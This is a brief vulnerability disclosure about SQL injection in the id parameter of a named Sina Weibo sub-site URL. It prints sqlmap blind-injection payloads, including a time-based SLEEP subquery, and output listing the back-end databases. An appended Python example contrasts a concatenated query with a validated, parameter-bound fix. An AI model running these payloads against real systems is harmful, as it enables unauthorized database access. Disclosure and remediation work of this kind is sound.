
SQL injection in a Sina Weibo sub-site

程序员文章站 2022-04-22 11:11:43

As the title says.

Vulnerable URL: https://v6.bang.weibo.com/xmt/matrix?id=21000037&from=prov&from_id=31

The id parameter is injectable.
 

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=21000040 AND 2081=2081&period=day&date=20160329&from=class&from_id=332

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=21000040 AND (SELECT * FROM (SELECT(SLEEP(5)))NBaZ)&period=day&date=20160329&from=class&from_id=332
---
[02:13:34] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[02:13:34] [INFO] fetching database names
[02:13:34] [INFO] fetching number of databases
[02:13:34] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:13:34] [INFO] retrieved: 
[02:13:36] [WARNING] reflective value(s) found and filtering out
3
[02:13:45] [INFO] retrieved: information_schema
[02:16:50] [INFO] retrieved: test
[02:17:39] [INFO] retrieved: top
available databases [3]:
[*] information_schema
[*] test
[*] top

 

Demonstrated.

Solution:

Filter the input.
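
The following is an added example, not code from the original report or from the affected site. It shows why the boolean-based blind payload in the sqlmap output works against a concatenated query and how validating `id` and binding it as a parameter removes the oracle. It assumes an in-memory SQLite database as a stand-in for the MySQL back end; the table, column and function names are hypothetical, and the false-condition payload is constructed.

```python
import sqlite3


def make_db():
    # Constructed sample data; table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE matrix (id INTEGER PRIMARY KEY, name TEXT)")
    db.execute("INSERT INTO matrix VALUES (21000040, 'sample account')")
    return db


def lookup_concatenated(db, raw_id):
    # Vulnerable pattern: the request value becomes part of the SQL text.
    sql = "SELECT name FROM matrix WHERE id = " + raw_id
    return db.execute(sql).fetchall()


def lookup_bound(db, raw_id):
    # Allowlist filter: ASCII decimal digits only, bounded length.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 18):
        raise ValueError("id must be a decimal integer")
    # The value is bound as data and never parsed as SQL.
    return db.execute(
        "SELECT name FROM matrix WHERE id = ?", (int(raw_id),)
    ).fetchall()


def respond(lookup, db, raw_id):
    # Models what the client sees: a status plus the rows rendered in the page.
    try:
        return ("200", lookup(db, raw_id))
    except ValueError:
        return ("400", [])


def boolean_oracle(lookup, db):
    # A boolean-based blind injection needs the true and false conditions
    # to produce distinguishable responses.
    true_case = respond(lookup, db, "21000040 AND 2081=2081")
    false_case = respond(lookup, db, "21000040 AND 2081=2082")  # constructed
    return true_case != false_case


if __name__ == "__main__":
    db = make_db()
    print("concatenated query leaks a boolean:", boolean_oracle(lookup_concatenated, db))
    print("validated + bound query leaks a boolean:", boolean_oracle(lookup_bound, db))
```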